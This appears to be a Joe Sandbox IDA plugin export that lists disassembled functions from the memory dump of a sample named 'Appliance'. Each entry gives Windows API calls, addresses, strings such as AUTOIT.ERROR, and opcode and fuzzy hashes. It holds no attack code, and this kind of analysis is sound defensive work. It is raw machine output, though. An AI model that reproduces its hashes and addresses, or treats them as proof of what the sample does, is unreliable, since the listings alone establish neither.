Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID: (
API String ID: 3050599898-2063206799
Opcode ID: 0cb5d49c36142ef0f2f0b162d0d557a5a8bf9749abafa43e482b3d33cf1b6a10
Instruction ID: ac30c990b54db9217f887ba28299b70b3f228109d0203caba103478e1b27608e
Opcode Fuzzy Hash: 0cb5d49c36142ef0f2f0b162d0d557a5a8bf9749abafa43e482b3d33cf1b6a10
Instruction Fuzzy Hash: 4F41E234105312AFCB20DF25CC84FB67BA8EF46324F14066EFA94971B2C7309849DB62

Function 00E586FC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00E58740
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00E58765
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E5877D
GetSystemMetrics.USER32(00000004), ref: 00E587A6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E3C1F2,00000000), ref: 00E587C6

Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0

GetSystemMetrics.USER32(00000004), ref: 00E587B1

Strings

(, xrefs: 00E58709

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID: (
API String ID: 2294984445-2063206799
Opcode ID: 958f344adcacf2f900bc5a00aec6e9156870e79753b1ca53d44dbc3080308be9
Instruction ID: 446904c1de3bfaebcff4082a2fbf9b3a0bbd3dc36ebd7dfa88301685c4401588
Opcode Fuzzy Hash: 958f344adcacf2f900bc5a00aec6e9156870e79753b1ca53d44dbc3080308be9
Instruction Fuzzy Hash: AE2188716153519FCF285F39CD04A6A37A5EB48366F245E2AFD26F21E0EA308858CB10

Function 00E2E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00E2E759
gethostname.WSOCK32(?,00000100), ref: 00E2E773
gethostbyname.WSOCK32(?), ref: 00E2E780
inet_ntoa.WSOCK32(?), ref: 00E2E7C2
_strcat.LIBCMT ref: 00E2E7D0
WSACleanup.WSOCK32 ref: 00E2E7F5

Strings

0.0.0.0, xrefs: 00E2E79E

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 971e20fe09eb514d4eef6365e67613ffd2f33ae3fcd8c45ef81601fa01f8eb2e
Instruction ID: 7177d4adcc5fc1960ab8c437f8d0c043a5e04025c5cf08fcb3feb1a2a7c36e2f
Opcode Fuzzy Hash: 971e20fe09eb514d4eef6365e67613ffd2f33ae3fcd8c45ef81601fa01f8eb2e
Instruction Fuzzy Hash: 8111B431904235BFCB287B61EC4AEEE77ACEF05715F100066F555B6191EEB48A858A70

Function 00E2F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00E2F641
_wcslen.LIBCMT ref: 00E2F652
_wcslen.LIBCMT ref: 00E2F690
_wcslen.LIBCMT ref: 00E2F6C6
_wcslen.LIBCMT ref: 00E2F6F6
_wcslen.LIBCMT ref: 00E2F706
_wcslen.LIBCMT ref: 00E2F742
_wcslen.LIBCMT ref: 00E2F771

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 726348926049929dc057c8a2e78eb8b67b2bc72e82a11085255e46966413b939
Instruction ID: f20928e41ff78faced4295c91b761e5f6a8a7a26747bf2a59f65598acce2f9dc
Opcode Fuzzy Hash: 726348926049929dc057c8a2e78eb8b67b2bc72e82a11085255e46966413b939
Instruction Fuzzy Hash: 02416265C21258B5DB11FBBA8C8AACFB7B8EF05310F518876E518E3121FA34D255C3B6

Function 00E5379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00E537B7
GetDC.USER32(00000000), ref: 00E537BF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E537CA
ReleaseDC.USER32(00000000,00000000), ref: 00E537D6
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E53812
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E53823
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E56504,?,?,000000FF,00000000,?,000000FF,?), ref: 00E5385E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E5387D

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: aecba71acb613fd7b3f8bb7d1f30125d88ec88adfe8ccb871f9c20d7a6c86528
Instruction ID: 6bc47cde88c73b155a5ce157cece794c2586985efff7a411b8ef9301ef821304
Opcode Fuzzy Hash: aecba71acb613fd7b3f8bb7d1f30125d88ec88adfe8ccb871f9c20d7a6c86528
Instruction Fuzzy Hash: C631C072205214BFEB294F61CC89FEB3BADEF09756F040465FE08EA191C6B59C45C7A0

Function 00E45A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00E45A8B, 00E45DE0
Not an Object type, xrefs: 00E45A64

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 9ca3e1d42fe1b4bb01687f10fcf8ac14e4cd6752b224264793380b3e7bbe5b91
Instruction ID: 32d6f95b4d7fc3d8c502c45f380a63f5457bc2c47001bf9727d247f6919e9add
Opcode Fuzzy Hash: 9ca3e1d42fe1b4bb01687f10fcf8ac14e4cd6752b224264793380b3e7bbe5b91
Instruction Fuzzy Hash: 0AD1D372A0070A9FDF10CF68E885AAEB7B5FF48308F149469E915BB282D770ED45CB50

Function 00E018A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00E01B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00E0194E
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E01B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E019D1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00E01B7B,?,00E01B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E01A64
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E01B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E01A7B

Part of subcall function 00DF3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DE6A79,?,0000015D,?,?,?,?,00DE85B0,000000FF,00000000,?,?), ref: 00DF3BC5

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00E01B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E01AF7
__freea.LIBCMT ref: 00E01B22
__freea.LIBCMT ref: 00E01B2E

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 2fd4bf24a156c14fecf3b5b7634cff8498f16dc1fd91f5322da1f3e9165fc2e7
Instruction ID: 981f73993dcd28e9446dce9d822a66071a8aa5b9774ba41a7633cfec965cea83
Opcode Fuzzy Hash: 2fd4bf24a156c14fecf3b5b7634cff8498f16dc1fd91f5322da1f3e9165fc2e7
Instruction Fuzzy Hash: 3391C272E00216ABDB248EA4C891AEE7BB5EF59314F585599E905FB1C0E734CDC4CB60

Function 00E44F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E450A5
VariantInit.OLEAUT32(?), ref: 00E451A6
VariantClear.OLEAUT32(?), ref: 00E451B0
VariantClear.OLEAUT32(?), ref: 00E4520D

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00E45189
Null Object assignment in FOR..IN loop, xrefs: 00E45035, 00E45163, 00E4521B

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: a087cae650eda2626f8f4c4051b25b331b8cecdfb1a4a6f213e772230f7fc673
Instruction ID: 591f3ce5def0cdb21fa6a27322ae5b5ce998d1d2b1e694b0c58e3cb4970177bb
Opcode Fuzzy Hash: a087cae650eda2626f8f4c4051b25b331b8cecdfb1a4a6f213e772230f7fc673
Instruction Fuzzy Hash: 9D91AE72A00615ABCF24CFA5EC48FAEBBB8EF45714F10955AF505BB281D7709941CBA0

Function 00E31B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00E31C1B
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E31C43
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00E31C67
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E31C97
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E31D1E
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E31D83
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E31DEF

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 785c36996f7f70c52bf00c4cb8ec548bf1f424503130f0838e39346bb0dabd91
Instruction ID: df4f6a7b61f75b3fc9d1335af8878b25919e9b28f870752b8296e6e1743f8f4c
Opcode Fuzzy Hash: 785c36996f7f70c52bf00c4cb8ec548bf1f424503130f0838e39346bb0dabd91
Instruction Fuzzy Hash: 39911171A002199FDB049F99C888BFEBBB4FF05316F1460ADE950FB291D774A940CB60

Function 00E443A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E443C8
CharUpperBuffW.USER32(?,?), ref: 00E444D7
_wcslen.LIBCMT ref: 00E444E7
VariantClear.OLEAUT32(?), ref: 00E4467C

Part of subcall function 00E3169E: VariantInit.OLEAUT32(00000000), ref: 00E316DE
Part of subcall function 00E3169E: VariantCopy.OLEAUT32(?,?), ref: 00E316E7
Part of subcall function 00E3169E: VariantClear.OLEAUT32(?), ref: 00E316F3

Strings

AUTOIT.ERROR, xrefs: 00E444DD, 00E444E2
Incorrect Parameter format, xrefs: 00E44403, 00E445FE

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 3c688ee167a6cc2ac0181790947c2f213cac61c86217f394fe102220c65cdca1
Instruction ID: 16be511d2f7089bc254a9c89843c6fcca6d453a197684b4ecb65ae82e1d08018
Opcode Fuzzy Hash: 3c688ee167a6cc2ac0181790947c2f213cac61c86217f394fe102220c65cdca1
Instruction Fuzzy Hash: 62918EB46083019FCB14EF24D481A6AB7E4FF89314F14891DF88AA7391DB31ED46CB62

Function 00E4560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00E208FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E20831,80070057,?,?,?,00E20C4E), ref: 00E2091B
Part of subcall function 00E208FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E20831,80070057,?,?), ref: 00E20936
Part of subcall function 00E208FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E20831,80070057,?,?), ref: 00E20944
Part of subcall function 00E208FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E20831,80070057,?), ref: 00E20954

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00E456AE
_wcslen.LIBCMT ref: 00E457B6
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00E4582C
CoTaskMemFree.OLE32(?), ref: 00E45837

Strings

NULL Pointer assignment, xrefs: 00E45880, 00E458AF

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: aa0b22eef4a25f61b767fac7f234b8f785f287abdedbd9abea41e550e5e9b299
Instruction ID: 496d3c7af2d29ebb2d9df81d0aaa6a7bf7d9918048fc500ac9f83b2ddd011351
Opcode Fuzzy Hash: aa0b22eef4a25f61b767fac7f234b8f785f287abdedbd9abea41e550e5e9b299
Instruction Fuzzy Hash: 2F91D272D00219ABDF14DFA4DC81EEEBBB9EF08314F10456AE915B7251EB709A45CFA0

Function 00E52B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00E52C1F
GetMenuItemCount.USER32(00000000), ref: 00E52C51
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E52C79
_wcslen.LIBCMT ref: 00E52CAF
GetMenuItemID.USER32(?,?), ref: 00E52CE9
GetSubMenu.USER32(?,?), ref: 00E52CF7

Part of subcall function 00E24393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E243AD
Part of subcall function 00E24393: GetCurrentThreadId.KERNEL32 ref: 00E243B4
Part of subcall function 00E24393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E22F00), ref: 00E243BB

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E52D7F

Part of subcall function 00E2F292: Sleep.KERNEL32 ref: 00E2F30A

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 26a10b9edf64d49e397ef7d7318d2201e60f810beaccfafee577fc1fb24aaf95
Instruction ID: a324083c684f5ee661e2f4c91a50014313553227b57dd883278f45b7fa45edd2
Opcode Fuzzy Hash: 26a10b9edf64d49e397ef7d7318d2201e60f810beaccfafee577fc1fb24aaf95
Instruction Fuzzy Hash: 3571AC75A00205AFCB14EF65C881AAEBBF1EF49311F10885CE916FB351DB74AE45CBA0

Function 00E2B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00E2B8C0
GetKeyboardState.USER32(?), ref: 00E2B8D5
SetKeyboardState.USER32(?), ref: 00E2B936
PostMessageW.USER32(?,00000101,00000010,?), ref: 00E2B964
PostMessageW.USER32(?,00000101,00000011,?), ref: 00E2B983
PostMessageW.USER32(?,00000101,00000012,?), ref: 00E2B9C4
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E2B9E7

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 1e74664533c8df9aacd810126d0cccfb75cce81ace7536ff606a8deaa34e350f
Instruction ID: 177e12c56c59ef691450aa8e0dc09494219b36b04d73e65bb57438acf9d613fd
Opcode Fuzzy Hash: 1e74664533c8df9aacd810126d0cccfb75cce81ace7536ff606a8deaa34e350f
Instruction Fuzzy Hash: D651E2A09087E53EFB3642389C45BBA7FE95B46308F089889E1D9A58D2C3D8ACC4D751

Function 00E2B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00E2B6E0
GetKeyboardState.USER32(?), ref: 00E2B6F5
SetKeyboardState.USER32(?), ref: 00E2B756
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E2B782
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E2B79F
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E2B7DE
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E2B7FF

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 1c7ddeb3d7684ad1612b5494ebb58971934a402f5b6ab8c0e12c779d4dcbf52e
Instruction ID: 49d1811f6f33d708f47462f62743b87aa29b8d205afb8ae00888bf02a0df8604
Opcode Fuzzy Hash: 1c7ddeb3d7684ad1612b5494ebb58971934a402f5b6ab8c0e12c779d4dcbf52e
Instruction Fuzzy Hash: DA5126A09087E53EFB3A8334DC55B767FA85B45308F0C958AE1D86A8C2D3D4EC88E750

Function 00DF57A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00DF5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00DF57E3
__fassign.LIBCMT ref: 00DF585E
__fassign.LIBCMT ref: 00DF5879
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00DF589F
WriteFile.KERNEL32(?,FF8BC35D,00000000,00DF5F16,00000000,?,?,?,?,?,?,?,?,?,00DF5F16,?), ref: 00DF58BE
WriteFile.KERNEL32(?,?,00000001,00DF5F16,00000000,?,?,?,?,?,?,?,?,?,00DF5F16,?), ref: 00DF58F7

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 50cb756315ab7744794ba8343aeba9ed382d2f97f773e1e24bdea5fdfdb414ca
Instruction ID: f6815594f57f37b0fdfb29bc61ac49ed2f30e0e34f725176b831066d1cefc1d9
Opcode Fuzzy Hash: 50cb756315ab7744794ba8343aeba9ed382d2f97f773e1e24bdea5fdfdb414ca
Instruction Fuzzy Hash: 7B51BF70A04649DFCB14CFA8EC81AEEBBF8EF09310F15855AEA55E7291D7709A41CF60

Function 00DE3090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00DE30BB
___except_validate_context_record.LIBVCRUNTIME ref: 00DE30C3
_ValidateLocalCookies.LIBCMT ref: 00DE3151
__IsNonwritableInCurrentImage.LIBCMT ref: 00DE317C
_ValidateLocalCookies.LIBCMT ref: 00DE31D1

Strings

csm, xrefs: 00DE3166

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
